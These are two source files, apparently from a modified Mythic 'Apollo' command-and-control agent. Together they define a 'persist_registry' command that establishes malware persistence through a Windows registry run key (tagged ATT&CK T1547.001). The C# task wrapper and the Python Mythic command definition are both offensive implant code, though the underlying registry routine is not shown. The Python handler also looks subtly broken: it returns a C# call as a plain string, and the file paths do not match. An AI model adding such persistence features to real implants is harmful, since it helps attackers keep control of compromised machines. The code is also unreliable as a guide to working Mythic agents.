File: Payload_Types/phantom_apollo/agent_code/Tasks/persist_registry.cs
using System;
using PhantomInterop.Classes;
using PhantomInterop.Interfaces;
using PhantomInterop.Structs.PhantomStructs;
using Phantom.Management.Persistence;

namespace Tasks
{
    public class persist_registry : ICommand
    {
        public string command { get; } = "persist_registry";
        public string description { get; } = "Establish persistence via Windows registry run key";
        public string help { get; } = "persist_registry";
        public string version { get; } = "1.0.0.0";
        public string id { get; } = "persist_registry";

        public PhantomTaskResponse CreateTasking(PhantomTaskMessage task)
        {
            try
            {
                return PersistenceHandler.CreateRegistryPersistence();
            }
            catch (Exception ex)
            {
                return new PhantomTaskResponse
                {
                    Completed = false,
                    UserOutput = $"Error creating registry persistence: {ex.Message}"
                };
            }
        }
    }
}

File: apollo/agent_functions/persist_registry.py
from mythic_container import MythicCommandBase, MythicTask
from mythic_container import TaskArguments


class PersistRegistryArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = []

    async def parse_arguments(self):
        pass


class PersistRegistryCommand(MythicCommandBase):
    cmd = "persist_registry"
    needs_admin = False
    help_cmd = "persist_registry"
    description = "Establish persistence via Windows registry run key"
    version = 1
    author = "@phantom"
    argument_class = PersistRegistryArguments
    attackmapping = ["T1547.001"]

    async def create_go_tasking(self, taskData: MythicTask) -> str:
        return "PersistenceHandler.CreateRegistryPersistence()"

    async def process_response(self, task: MythicTask, response: any) -> str:
        return f"Registry persistence: {response}"